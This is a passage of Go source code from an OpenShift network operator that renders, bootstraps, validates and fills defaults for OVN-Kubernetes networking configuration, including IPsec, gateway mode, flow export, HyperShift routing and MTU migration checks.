bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_LOCAL_PORT)
data.Data["OVN_SB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s",
bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_LOCAL_PORT)
data.Data["OVN_SB_DB_ROUTE_HOST"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost
var routePort string
if pubStrategy != nil && pubStrategy.Type == hyperv1.NodePort {
routePort = strconv.Itoa(int(bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort))
} else {
routePort = OVN_SB_DB_ROUTE_PORT
}
data.Data["OVN_SB_DB_ROUTE_PORT"] = routePort
}
data.Data["OVN_NB_INACTIVITY_PROBE"] = nb_inactivity_probe
data.Data["OVN_NB_DB_LIST"] = dbList(bootstrapResult.OVN.MasterAddresses, OVN_NB_PORT)
data.Data["OVN_SB_DB_LIST"] = dbList(bootstrapResult.OVN.MasterAddresses, OVN_SB_PORT)
data.Data["OVN_DB_CLUSTER_INITIATOR"] = bootstrapResult.OVN.ClusterInitiator
data.Data["OVN_MIN_AVAILABLE"] = len(bootstrapResult.OVN.MasterAddresses)/2 + 1
data.Data["LISTEN_DUAL_STACK"] = listenDualStack(bootstrapResult.OVN.MasterAddresses[0])
data.Data["OVN_CERT_CN"] = OVN_CERT_CN
data.Data["OVN_NORTHD_PROBE_INTERVAL"] = os.Getenv("OVN_NORTHD_PROBE_INTERVAL")
data.Data["NetFlowCollectors"] = ""
data.Data["SFlowCollectors"] = ""
data.Data["IPFIXCollectors"] = ""
data.Data["IPFIXCacheMaxFlows"] = ""
data.Data["IPFIXCacheActiveTimeout"] = ""
data.Data["IPFIXSampling"] = ""
data.Data["OVNPolicyAuditRateLimit"] = c.PolicyAuditConfig.RateLimit
data.Data["OVNPolicyAuditMaxFileSize"] = c.PolicyAuditConfig.MaxFileSize
data.Data["OVNPolicyAuditDestination"] = c.PolicyAuditConfig.Destination
data.Data["OVNPolicyAuditSyslogFacility"] = c.PolicyAuditConfig.SyslogFacility
data.Data["OVN_LOG_PATTERN_CONSOLE"] = OVN_LOG_PATTERN_CONSOLE
data.Data["PlatformType"] = bootstrapResult.Infra.PlatformType
if bootstrapResult.Infra.PlatformType == configv1.AzurePlatformType {
data.Data["OVNPlatformAzure"] = true
} else {
data.Data["OVNPlatformAzure"] = false
}
var ippools string
for _, net := range conf.ClusterNetwork {
if len(ippools) != 0 {
ippools += ","
}
ippools += fmt.Sprintf("%s/%d", net.CIDR, net.HostPrefix)
}
data.Data["OVN_cidr"] = ippools
data.Data["OVN_service_cidr"] = strings.Join(conf.ServiceNetwork, ",")
if c.HybridOverlayConfig != nil {
if len(c.HybridOverlayConfig.HybridClusterNetwork) > 0 {
data.Data["OVNHybridOverlayNetCIDR"] = c.HybridOverlayConfig.HybridClusterNetwork[0].CIDR
} else {
data.Data["OVNHybridOverlayNetCIDR"] = ""
}
if c.HybridOverlayConfig.HybridOverlayVXLANPort != nil {
data.Data["OVNHybridOverlayVXLANPort"] = c.HybridOverlayConfig.HybridOverlayVXLANPort
} else {
data.Data["OVNHybridOverlayVXLANPort"] = ""
}
data.Data["OVNHybridOverlayEnable"] = true
} else {
data.Data["OVNHybridOverlayNetCIDR"] = ""
data.Data["OVNHybridOverlayEnable"] = false
data.Data["OVNHybridOverlayVXLANPort"] = ""
}
// If IPsec is enabled for the first time, we start the daemonset. If it is
// disabled after that, we do not stop the daemonset but only stop IPsec.
//
// TODO: We need to do this as, by default, we maintain IPsec state on the
// node in order to maintain encrypted connectivity in the case of upgrades.
// If we only unrender the IPsec daemonset, we will be unable to cleanup
// the IPsec state on the node and the traffic will continue to be
// encrypted.
if c.IPsecConfig != nil {
// IPsec is enabled
data.Data["OVNIPsecDaemonsetEnable"] = true
data.Data["OVNIPsecEnable"] = true
} else {
if bootstrapResult.OVN.IPsecUpdateStatus != nil {
// IPsec has previously started and
// now it has been requested to be disabled
data.Data["OVNIPsecDaemonsetEnable"] = true
data.Data["OVNIPsecEnable"] = false
} else {
// IPsec has never started
data.Data["OVNIPsecDaemonsetEnable"] = false
data.Data["OVNIPsecEnable"] = false
}
}
if c.GatewayConfig != nil && c.GatewayConfig.RoutingViaHost {
data.Data["OVN_GATEWAY_MODE"] = OVN_LOCAL_GW_MODE
} else {
data.Data["OVN_GATEWAY_MODE"] = OVN_SHARED_GW_MODE
}
exportNetworkFlows := conf.ExportNetworkFlows
if exportNetworkFlows != nil {
if exportNetworkFlows.NetFlow != nil {
var collectors strings.Builder
for _, v := range exportNetworkFlows.NetFlow.Collectors {
collectors.WriteString(string(v) + ",")
}
data.Data["NetFlowCollectors"] = strings.TrimSuffix(collectors.String(), ",")
}
if exportNetworkFlows.SFlow != nil {
var collectors strings.Builder
for _, v := range exportNetworkFlows.SFlow.Collectors {
collectors.WriteString(string(v) + ",")
}
data.Data["SFlowCollectors"] = strings.TrimSuffix(collectors.String(), ",")
}
if exportNetworkFlows.IPFIX != nil {
var collectors strings.Builder
for _, v := range exportNetworkFlows.IPFIX.Collectors {
collectors.WriteString(string(v) + ",")
}
data.Data["IPFIXCollectors"] = strings.TrimSuffix(collectors.String(), ",")
}
}
renderOVNFlowsConfig(bootstrapResult, &data)
if len(bootstrapResult.OVN.MasterAddresses) == 1 {
data.Data["IsSNO"] = true
data.Data["NorthdThreads"] = 1
} else {
data.Data["IsSNO"] = false
// OVN 22.06 and later support multiple northd threads.
// Less resource constrained clusters can use multiple threads
// in northd to improve network operation latency at the cost
// of a bit of CPU.
data.Data["NorthdThreads"] = 4
}
var manifestSubDir string
manifestDirs := make([]string, 0, 2)
manifestDirs = append(manifestDirs, filepath.Join(manifestDir, "network/ovn-kubernetes/common"))
if bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Enabled {
manifestSubDir = "network/ovn-kubernetes/managed"
manifestDirs = append(manifestDirs, filepath.Join(manifestDir, manifestSubDir))
} else {
manifestSubDir = "network/ovn-kubernetes/self-hosted"
manifestDirs = append(manifestDirs, filepath.Join(manifestDir, manifestSubDir))
}
manifests, err := render.RenderDirs(manifestDirs, &data)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to render manifests")
}
objs = append(objs, manifests...)
nodeMode := bootstrapResult.OVN.OVNKubernetesConfig.NodeMode
if nodeMode == OVN_NODE_MODE_DPU_HOST {
data.Data["OVN_NODE_MODE"] = nodeMode
manifests, err = render.RenderTemplate(filepath.Join(manifestDir, manifestSubDir+"/ovnkube-node.yaml"), &data)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to render manifests")
}
objs = append(objs, manifests...)
} else if nodeMode == OVN_NODE_MODE_DPU {
// "OVN_NODE_MODE" not set when render.RenderDir() called above,
// so render just the error-cni.yaml with "OVN_NODE_MODE" set.
data.Data["OVN_NODE_MODE"] = nodeMode
manifests, err = render.RenderTemplate(filepath.Join(manifestDir, "network/ovn-kubernetes/common/error-cni.yaml"), &data)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to render manifests")
}
objs = append(objs, manifests...)
// Run KubeProxy on DPU
// DPU_DEV_PREVIEW
// Node Mode is currently configured via a stand-alone configMap and stored
// in bootstrapResult. Once out of DevPreview, CNO API will be expanded to
// include Node Mode and it will be stored in conf (operv1.NetworkSpec) and
// defaultDeployKubeProxy() will have access and this can be removed.
if conf.DeployKubeProxy == nil {
v := true
conf.DeployKubeProxy = &v
} else {
*conf.DeployKubeProxy = true
}
fillKubeProxyDefaults(conf, nil)
}
// obtain the current IP family mode.
ipFamilyMode := names.IPFamilySingleStack
if len(conf.ServiceNetwork) == 2 {
ipFamilyMode = names.IPFamilyDualStack
}
// check if the IP family mode has changed and control the conversion process.
updateNode, updateMaster := shouldUpdateOVNKonIPFamilyChange(bootstrapResult.OVN, ipFamilyMode)
// annotate the daemonset and the daemonset template with the current IP family mode,
// this triggers a daemonset restart if there are changes.
err = setOVNObjectAnnotation(objs, names.NetworkIPFamilyModeAnnotation, ipFamilyMode)
if err != nil {
return nil, progressing, errors.Wrapf(err, "failed to set IP family %s annotation on daemonsets or statefulsets", ipFamilyMode)
}
// don't process upgrades if we are handling a dual-stack conversion.
if updateMaster && updateNode {
updateNode, updateMaster = shouldUpdateOVNKonUpgrade(bootstrapResult.OVN, os.Getenv("RELEASE_VERSION"))
}
renderPrePull := false
if updateNode {
updateNode, renderPrePull = shouldUpdateOVNKonPrepull(bootstrapResult.OVN, os.Getenv("RELEASE_VERSION"))
}
// If we need to delay master or node daemonset rollout, then we'll tag that daemonset with "create-only"
if !updateMaster {
kind := bootstrapResult.OVN.MasterUpdateStatus.Kind
namespace := bootstrapResult.OVN.MasterUpdateStatus.Namespace
name := bootstrapResult.OVN.MasterUpdateStatus.Name
k8s.UpdateObjByGroupKindName(objs, "apps", kind, namespace, name, func(o *uns.Unstructured) {
anno := o.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[names.CreateOnlyAnnotation] = "true"
o.SetAnnotations(anno)
})
}
if !updateNode {
kind := bootstrapResult.OVN.NodeUpdateStatus.Kind
namespace := bootstrapResult.OVN.NodeUpdateStatus.Namespace
name := bootstrapResult.OVN.NodeUpdateStatus.Name
k8s.UpdateObjByGroupKindName(objs, "apps", kind, namespace, name, func(o *uns.Unstructured) {
anno := o.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[names.CreateOnlyAnnotation] = "true"
o.SetAnnotations(anno)
})
}
if !renderPrePull {
// remove prepull from the list of objects to render.
objs = k8s.RemoveObjByGroupKindName(objs, "apps", "DaemonSet", "openshift-ovn-kubernetes", "ovnkube-upgrades-prepuller")
}
if bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Enabled && bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost == "" {
k8s.UpdateObjByGroupKindName(objs, "apps", "DaemonSet", "openshift-ovn-kubernetes", "ovnkube-node", func(o *uns.Unstructured) {
anno := o.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[names.CreateWaitAnnotation] = "true"
o.SetAnnotations(anno)
})
progressing = true
}
return objs, progressing, nil
}
// renderOVNFlowsConfig renders the bootstrapped information from the ovs-flows-config ConfigMap
func renderOVNFlowsConfig(bootstrapResult *bootstrap.BootstrapResult, data *render.RenderData) {
flows := bootstrapResult.OVN.FlowsConfig
if flows == nil {
return
}
if flows.Target == "" {
klog.Warningf("ovs-flows-config configmap 'target' field can't be empty. Ignoring configuration: %+v", flows)
return
}
// if IPFIX collectors are provided by means of both the operator configuration and the
// ovs-flows-config ConfigMap, we will merge both targets
if colls, ok := data.Data["IPFIXCollectors"].(string); !ok || colls == "" {
data.Data["IPFIXCollectors"] = flows.Target
} else {
data.Data["IPFIXCollectors"] = colls + "," + flows.Target
}
if flows.CacheMaxFlows != nil {
data.Data["IPFIXCacheMaxFlows"] = *flows.CacheMaxFlows
}
if flows.Sampling != nil {
data.Data["IPFIXSampling"] = *flows.Sampling
}
if flows.CacheActiveTimeout != nil {
data.Data["IPFIXCacheActiveTimeout"] = *flows.CacheActiveTimeout
}
}
func bootstrapOVNHyperShiftConfig(hc *HyperShiftConfig, kubeClient cnoclient.Client) (*bootstrap.OVNHyperShiftBootstrapResult, error) {
ovnHypershiftResult := &bootstrap.OVNHyperShiftBootstrapResult{
Enabled: hc.Enabled,
Namespace: hc.Namespace,
}
if !hc.Enabled {
return ovnHypershiftResult, nil
}
hcp := &hyperv1.HostedControlPlane{ObjectMeta: metav1.ObjectMeta{Name: hc.Name}}
err := kubeClient.ClientFor(cnoclient.ManagementClusterName).CRClient().Get(context.TODO(), types.NamespacedName{Namespace: hc.Namespace, Name: hc.Name}, hcp)
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find hosted control plane")
} else {
return nil, fmt.Errorf("Could not get hosted control plane: %v", err)
}
}
ovnHypershiftResult.ClusterID = hcp.Spec.ClusterID
switch hcp.Spec.ControllerAvailabilityPolicy {
case hyperv1.HighlyAvailable:
ovnHypershiftResult.ControlPlaneReplicas = 3
default:
ovnHypershiftResult.ControlPlaneReplicas = 1
}
for _, svc := range hcp.Spec.Services {
// TODO: instead of the hardcoded string use ServiceType hyperv1.OVNSbDb once the API is updated
if svc.Service == "OVNSbDb" {
s := svc.ServicePublishingStrategy
ovnHypershiftResult.ServicePublishingStrategy = &s
}
}
if ovnHypershiftResult.ServicePublishingStrategy == nil {
klog.Warningf("service publishing strategy for OVN southbound database does not exist in hyperv1.HostedControlPlane %s/%s. Defaulting to route", hc.Name, hc.Namespace)
ovnHypershiftResult.ServicePublishingStrategy = &hyperv1.ServicePublishingStrategy{
Type: hyperv1.Route,
}
}
switch ovnHypershiftResult.ServicePublishingStrategy.Type {
case hyperv1.Route:
{
route := &routev1.Route{}
gvr := schema.GroupVersionResource{
Group: "route.openshift.io",
Version: "v1",
Resource: "routes",
}
clusterClient := kubeClient.ClientFor(client.ManagementClusterName)
routeObj, err := clusterClient.Dynamic().Resource(gvr).Namespace(hc.Namespace).Get(context.TODO(), "ovnkube-sbdb", metav1.GetOptions{})
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find ovnkube-sbdb route")
} else {
return nil, fmt.Errorf("could not get ovnkube-sbdb route: %v", err)
}
} else {
err := runtime.DefaultUnstructuredConverter.FromUnstructured(routeObj.UnstructuredContent(), route)
if err != nil {
return nil, err
}
if (len(route.Status.Ingress) < 1 || route.Status.Ingress[0].Host == "") && route.Spec.Host == "" {
return ovnHypershiftResult, nil
}
if len(route.Status.Ingress) >= 1 && route.Status.Ingress[0].Host != "" {
ovnHypershiftResult.OVNSbDbRouteHost = route.Status.Ingress[0].Host
} else if route.Spec.Host != "" {
ovnHypershiftResult.OVNSbDbRouteHost = route.Spec.Host
}
klog.Infof("Overriding OVN configuration route to %s", ovnHypershiftResult.OVNSbDbRouteHost)
}
}
case hyperv1.NodePort:
{
svc := &corev1.Service{}
clusterClient := kubeClient.ClientFor(client.ManagementClusterName)
err = clusterClient.CRClient().Get(context.TODO(), types.NamespacedName{Namespace: hc.Namespace, Name: "ovnkube-master-external"}, svc)
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find ovnkube-master service")
return ovnHypershiftResult, nil
} else {
return nil, fmt.Errorf("could not get ovnkube-master service: %v", err)
}
}
var sbDbPort int32
for _, p := range svc.Spec.Ports {
if p.Name == "south" {
sbDbPort = p.NodePort
}
}
if sbDbPort > 0 {
ovnHypershiftResult.OVNSbDbRouteHost = ovnHypershiftResult.ServicePublishingStrategy.NodePort.Address
ovnHypershiftResult.OVNSbDbRouteNodePort = sbDbPort
} else {
klog.Infof("Node port not defined for ovnkube-master service")
}
}
default:
return nil, fmt.Errorf("unsupported service publishing strategy type: %s", ovnHypershiftResult.ServicePublishingStrategy.Type)
}
return ovnHypershiftResult, nil
}
// bootstrapOVNConfig returns the value of mode found in the openshift-ovn-kubernetes/dpu-mode-config configMap
// if it exists, otherwise returns default configuration for OCP clusters using OVN-Kubernetes
func bootstrapOVNConfig(conf *operv1.Network, kubeClient cnoclient.Client, hc *HyperShiftConfig) (*bootstrap.OVNConfigBoostrapResult, error) {
ovnConfigResult := &bootstrap.OVNConfigBoostrapResult{
NodeMode: OVN_NODE_MODE_FULL,
}
if conf.Spec.DefaultNetwork.OVNKubernetesConfig.GatewayConfig == nil {
bootstrapOVNGatewayConfig(conf, kubeClient.ClientFor("").CRClient())
}
var err error
ovnConfigResult.HyperShiftConfig, err = bootstrapOVNHyperShiftConfig(hc, kubeClient)
if err != nil {
return ovnConfigResult, err
}
cm := &corev1.ConfigMap{}
dmc := types.NamespacedName{Namespace: "openshift-network-operator", Name: "dpu-mode-config"}
err = kubeClient.ClientFor("").CRClient().Get(context.TODO(), dmc, cm)
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find dpu-mode-config")
} else {
return nil, fmt.Errorf("Could not determine Node Mode: %w", err)
}
} else {
nodeModeOverride := cm.Data["mode"]
if nodeModeOverride != OVN_NODE_MODE_DPU_HOST && nodeModeOverride != OVN_NODE_MODE_DPU {
klog.Warningf("dpu-mode-config does not match %q or %q, is: %q. Using OVN configuration: %+v",
OVN_NODE_MODE_DPU_HOST, OVN_NODE_MODE_DPU, nodeModeOverride, ovnConfigResult)
return ovnConfigResult, nil
}
ovnConfigResult.NodeMode = nodeModeOverride
klog.Infof("Overriding OVN configuration to %+v", ovnConfigResult)
}
return ovnConfigResult, nil
}
// validateOVNKubernetes checks that the ovn-kubernetes specific configuration
// is basically sane.
func validateOVNKubernetes(conf *operv1.NetworkSpec) []error {
out := []error{}
var cnHasIPv4, cnHasIPv6 bool
for _, cn := range conf.ClusterNetwork {
if utilnet.IsIPv6CIDRString(cn.CIDR) {
cnHasIPv6 = true
} else {
cnHasIPv4 = true
}
}
if !cnHasIPv6 && !cnHasIPv4 {
out = append(out, errors.Errorf("ClusterNetwork cannot be empty"))
}
var snHasIPv4, snHasIPv6 bool
for _, sn := range conf.ServiceNetwork {
if utilnet.IsIPv6CIDRString(sn) {
snHasIPv6 = true
} else {
snHasIPv4 = true
}
}
if !snHasIPv6 && !snHasIPv4 {
out = append(out, errors.Errorf("ServiceNetwork cannot be empty"))
}
if cnHasIPv4 != snHasIPv4 || cnHasIPv6 != snHasIPv6 {
out = append(out, errors.Errorf("ClusterNetwork and ServiceNetwork must have matching IP families"))
}
if len(conf.ServiceNetwork) > 2 || (len(conf.ServiceNetwork) == 2 && (!snHasIPv4 || !snHasIPv6)) {
out = append(out, errors.Errorf("ServiceNetwork must have either a single CIDR or a dual-stack pair of CIDRs"))
}
oc := conf.DefaultNetwork.OVNKubernetesConfig
if oc != nil {
minMTU := MinMTUIPv4
if cnHasIPv6 {
minMTU = MinMTUIPv6
}
if oc.MTU != nil && (*oc.MTU < minMTU || *oc.MTU > MaxMTU) {
out = append(out, errors.Errorf("invalid MTU %d", *oc.MTU))
}
if oc.GenevePort != nil && (*oc.GenevePort < 1 || *oc.GenevePort > 65535) {
out = append(out, errors.Errorf("invalid GenevePort %d", *oc.GenevePort))
}
}
return out
}
func getOVNEncapOverhead(conf *operv1.NetworkSpec) uint32 {
const geneveOverhead = 100
const ipsecOverhead = 46 // Transport mode, AES-GCM
var encapOverhead uint32 = geneveOverhead
if conf.DefaultNetwork.OVNKubernetesConfig.IPsecConfig != nil {
encapOverhead += ipsecOverhead
}
return encapOverhead
}
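// Worked example (illustrative numbers): on a host NIC with MTU 9000, the
// derived cluster MTU is 9000-100=8900 with Geneve alone, or 9000-146=8854
// when IPsec is enabled as well.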
// isOVNKubernetesChangeSafe currently returns an error if any changes to immutable
// fields are made.
// In the future, we may support rolling out MTU or other alterations.
func isOVNKubernetesChangeSafe(prev, next *operv1.NetworkSpec) []error {
pn := prev.DefaultNetwork.OVNKubernetesConfig
nn := next.DefaultNetwork.OVNKubernetesConfig
errs := []error{}
if next.Migration != nil && next.Migration.MTU != nil {
mtuNet := next.Migration.MTU.Network
mtuMach := next.Migration.MTU.Machine
// For MTU values provided for migration, verify that:
// - The current and target MTUs for the CNI are provided
// - The machine target MTU is provided
// - The current MTU actually matches the MTU known as current
// - The machine target MTU has a valid overhead with the CNI target MTU
if mtuNet == nil || mtuMach == nil || mtuNet.From == nil || mtuNet.To == nil || mtuMach.To == nil {
errs = append(errs, errors.Errorf("invalid Migration.MTU, at least one of the required fields is missing"))
} else {
// Only check next.Migration.MTU.Network.From when it changes
checkPrevMTU := prev.Migration == nil || prev.Migration.MTU == nil || prev.Migration.MTU.Network == nil || !reflect.DeepEqual(prev.Migration.MTU.Network.From, next.Migration.MTU.Network.From)
if checkPrevMTU && !reflect.DeepEqual(next.Migration.MTU.Network.From, pn.MTU) {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Network.From(%d) not equal to the currently applied MTU(%d)", *next.Migration.MTU.Network.From, *pn.MTU))
}
minMTU := MinMTUIPv4
for _, cn := range next.ClusterNetwork {
if utilnet.IsIPv6CIDRString(cn.CIDR) {
minMTU = MinMTUIPv6
break
}
}
if *next.Migration.MTU.Network.To < minMTU || *next.Migration.MTU.Network.To > MaxMTU {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Network.To(%d), has to be in range: %d-%d", *next.Migration.MTU.Network.To, minMTU, MaxMTU))
}
if *next.Migration.MTU.Machine.To < minMTU || *next.Migration.MTU.Machine.To > MaxMTU {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Machine.To(%d), has to be in range: %d-%d", *next.Migration.MTU.Machine.To, minMTU, MaxMTU))
}
if (*next.Migration.MTU.Network.To + getOVNEncapOverhead(next)) > *next.Migration.MTU.Machine.To {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Machine.To(%d), has to be at least %d", *next.Migration.MTU.Machine.To, *next.Migration.MTU.Network.To+getOVNEncapOverhead(next)))
}
}
} else if !reflect.DeepEqual(pn.MTU, nn.MTU) {
errs = append(errs, errors.Errorf("cannot change ovn-kubernetes MTU without migration"))
}
if !reflect.DeepEqual(pn.GenevePort, nn.GenevePort) {
errs = append(errs, errors.Errorf("cannot change ovn-kubernetes genevePort"))
}
if pn.HybridOverlayConfig == nil && nn.HybridOverlayConfig != nil {
errs = append(errs, errors.Errorf("cannot start a hybrid overlay network after install time"))
}
if pn.HybridOverlayConfig != nil {
if !reflect.DeepEqual(pn.HybridOverlayConfig, nn.HybridOverlayConfig) {
errs = append(errs, errors.Errorf("cannot edit a running hybrid overlay network"))
}
}
if pn.IPsecConfig != nil && nn.IPsecConfig != nil {
if !reflect.DeepEqual(pn.IPsecConfig, nn.IPsecConfig) {
errs = append(errs, errors.Errorf("cannot edit IPsec configuration at runtime"))
}
}
return errs
}
func fillOVNKubernetesDefaults(conf, previous *operv1.NetworkSpec, hostMTU int) {
if conf.DefaultNetwork.OVNKubernetesConfig == nil {
conf.DefaultNetwork.OVNKubernetesConfig = &operv1.OVNKubernetesConfig{}
}
sc := conf.DefaultNetwork.OVNKubernetesConfig
// MTU is currently the only field we pull from previous.
// If it's not supplied, we infer it by probing a node's interface via the mtu-prober job.
// However, this can never change, so we always prefer previous.
if sc.MTU == nil {
var mtu uint32
if previous != nil && previous.DefaultNetwork.OVNKubernetesConfig != nil &&
previous.DefaultNetwork.OVNKubernetesConfig.MTU != nil {
mtu = *previous.DefaultNetwork.OVNKubernetesConfig.MTU
} else {
// utter paranoia
// somehow we didn't probe the MTU in the controller, but we need it.
// This might be wrong in cases where the CNO is not local (e.g. Hypershift).
if hostMTU == 0 {
log.Printf("BUG: Probed MTU wasn't supplied, but was needed. Falling back to host MTU")
hostMTU, _ = GetDefaultMTU()
if hostMTU == 0 { // this is beyond unlikely.
panic("BUG: Probed MTU wasn't supplied, host MTU invalid")
}
}
mtu = uint32(hostMTU) - getOVNEncapOverhead(conf)
}
sc.MTU = &mtu
}
if sc.GenevePort == nil {
var geneve uint32 = uint32(6081)
sc.GenevePort = &geneve
}
if sc.PolicyAuditConfig == nil {
sc.PolicyAuditConfig = &operv1.PolicyAuditConfig{}
}
if sc.PolicyAuditConfig.RateLimit == nil {
var ratelimit uint32 = uint32(20)
sc.PolicyAuditConfig.RateLimit = &ratelimit
}
if sc.PolicyAuditConfig.MaxFileSize == nil {
var maxfilesize uint32 = uint32(50)
sc.PolicyAuditConfig.MaxFileSize = &maxfilesize
}
if sc.PolicyAuditConfig.Destination == "" {
var destination string = "null"
sc.PolicyAuditConfig.Destination = destination
}
if sc.PolicyAuditConfig.SyslogFacility == "" {
var syslogfacility string = "local0"
sc.PolicyAuditConfig.SyslogFacility = syslogfacility
}
}
type replicaCountDecoder struct {
ControlPlane struct {
Replicas string `json:"replicas"`
} `json:"controlPlane"`
}
// bootstrapOVNGatewayConfig sets the Network.operator.openshift.io.Spec.DefaultNetwork.OVNKubernetesConfig.GatewayConfig value
// based on the values from the "gateway-mode-config" map if any
func bootstrapOVNGatewayConfig(conf *operv1.Network, kubeClient crclient.Client) {
// handle upgrade logic for gateway mode in OVN-K plugin (migration from the hidden config map to the proper API)
// TODO: Remove this logic in future releases when we are sure everyone has migrated away from the config-map
cm := &corev1.ConfigMap{}
nsn := types.NamespacedName{Namespace: "openshift-network-operator", Name: "gateway-mode-config"}
err := kubeClient.Get(context.TODO(), nsn, cm)
modeOverride := OVN_SHARED_GW_MODE
routeViaHost := false
if err != nil {
klog.Infof("Did not find gateway-mode-config. Using default gateway mode: %s", OVN_SHARED_GW_MODE)
} else {
modeOverride = cm.Data["mode"]
if modeOverride != OVN_SHARED_GW_MODE && modeOverride != OVN_LOCAL_GW_MODE {
klog.Warningf("gateway-mode-config does not match %q or %q, is: %q. Using default gateway mode: %s",
OVN_LOCAL_GW_MODE, OVN_SHARED_GW_MODE, modeOverride, OVN_SHARED_GW_MODE)
modeOverride = OVN_SHARED_GW_MODE
}
}
if modeOverride == OVN_LOCAL_GW_MODE {
routeViaHost = true
}
conf.Spec.DefaultNetwork.OVNKubernetesConfig.GatewayConfig = &operv1.GatewayConfig{
RoutingViaHost: routeViaHost,
}
klog.Infof("Gateway mode is %s", modeOverride)
}
func getMasterAddresses(kubeClient crclient.Client, controlPlaneReplicaCount int, hypershift bool) ([]string, error) {
var heartBeat int
masterNodeList := &corev1.NodeList{}
ovnMasterAddresses := make([]string, 0, controlPlaneReplicaCount)
if hypershift {
for i := 0; i < controlPlaneReplicaCount; i++ {
ovnMasterAddresses = append(ovnMasterAddresses, fmt.Sprintf("ovnkube-master-%d.ovnkube-master-internal.%s.svc.cluster.local", i, os.Getenv("HOSTED_CLUSTER_NAMESPACE")))
}
} else {
err := wait.PollImmediate(OVN_MASTER_DISCOVERY_POLL*time.Second, time.Duration(OVN_MASTER_DISCOVERY_TIMEOUT)*time.Second, func() (bool, error) {
matchingLabels := &crclient.MatchingLabels{"node-role.kubernetes.io/master": ""}
if err := kubeClient.List(context.TODO(), masterNodeList, matchingLabels); err != nil {
return false, err
}
if len(masterNodeList.Items) != 0 && controlPlaneReplicaCount == len(masterNodeList.Items) {
return true, nil
}
heartBeat++
if heartBeat%3 == 0 {
klog.V(2).Infof("Waiting to complete OVN bootstrap: found (%d) master nodes out of (%d) expected: timing out in %d seconds",
len(masterNodeList.Items), controlPlaneReplicaCount, OVN_MASTER_DISCOVERY_TIMEOUT-OVN_MASTER_DISCOVERY_POLL*heartBeat)
}
return false, nil
})
if wait.ErrWaitTimeout == err {
klog.Warningf("Timeout exceeded while bootstraping OVN, expected amount of control plane nodes (%v) do not match found (%v): %s, continuing deployment with found replicas", controlPlaneReplicaCount, len(masterNodeList.Items))
// On certain types of cluster this condition will never be met (assisted installer, for example)
// As to not hold the reconciliation loop for too long on such clusters: dynamically modify the timeout
// to a shorter and shorter value. Never reach 0 however as that will result in a `PollInfinity`.
// Right now we'll do:
// - First reconciliation 250 second timeout
// - Second reconciliation 130 second timeout
// - >= Third reconciliation 10 second timeout
if OVN_MASTER_DISCOVERY_TIMEOUT-OVN_MASTER_DISCOVERY_BACKOFF > 0 {
OVN_MASTER_DISCOVERY_TIMEOUT = OVN_MASTER_DISCOVERY_TIMEOUT - OVN_MASTER_DISCOVERY_BACKOFF
}
} else if err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN, err: %v", err)
}
for _, masterNode := range masterNodeList.Items {
var ip string
for _, address := range masterNode.Status.Addresses {
if address.Type == corev1.NodeInternalIP {
ip = address.Address
break
}
}
if ip == "" {
return nil, fmt.Errorf("No InternalIP found on master node '%s'", masterNode.Name)
}
ovnMasterAddresses = append(ovnMasterAddresses, ip)
}
}
return ovnMasterAddresses, nil
}
func bootstrapOVN(conf *operv1.Network, kubeClient cnoclient.Client) (*bootstrap.OVNBootstrapResult, error) {
clusterConfig := &corev1.ConfigMap{}
clusterConfigLookup := types.NamespacedName{Name: CLUSTER_CONFIG_NAME, Namespace: CLUSTER_CONFIG_NAMESPACE}
if err := kubeClient.ClientFor("").CRClient().Get(context.TODO(), clusterConfigLookup, clusterConfig); err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN, unable to retrieve cluster config: %s", err)
}
rcD := replicaCountDecoder{}
if err := yaml.Unmarshal([]byte(clusterConfig.Data["install-config"]), &rcD); err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN, unable to unmarshal install-config: %s", err)
}
hc := NewHyperShiftConfig()
ovnConfigResult, err := bootstrapOVNConfig(conf, kubeClient, hc)
if err != nil {
return nil, fmt.Errorf("Unable to bootstrap OVN config, err: %v", err)
}
var controlPlaneReplicaCount int
if hc.Enabled {
controlPlaneReplicaCount = ovnConfigResult.HyperShiftConfig.ControlPlaneReplicas
} else {
controlPlaneReplicaCount, _ = strconv.Atoi(rcD.ControlPlane.Replicas)
}
ovnMasterAddresses, err := getMasterAddresses(kubeClient.ClientFor("").CRClient(), controlPlaneReplicaCount, hc.Enabled)
if err != nil {
return nil, err
}
sort.Strings(ovnMasterAddresses)
// clusterInitiator is used to avoid a split-brain scenario for the OVN NB/SB DBs. We want to consistently initialize
// any OVN cluster which is bootstrapped here, to the same initiator (should it still exist), hence we annotate the
// network.operator.openshift.io CRD with this information and always try to re-use the same member for the OVN RAFT
// cluster initialization
var clusterInitiator string
currentAnnotation := conf.GetAnnotations()
if cInitiator, ok := currentAnnotation[names.OVNRaftClusterInitiator]; ok && currentInitiatorExists(ovnMasterAddresses, cInitiator) {
clusterInitiator = cInitiator
} else {
clusterInitiator = ovnMasterAddresses[0]
if currentAnnotation == nil {
currentAnnotation = map[string]string{
names.OVNRaftClusterInitiator: clusterInitiator,
}
} else {
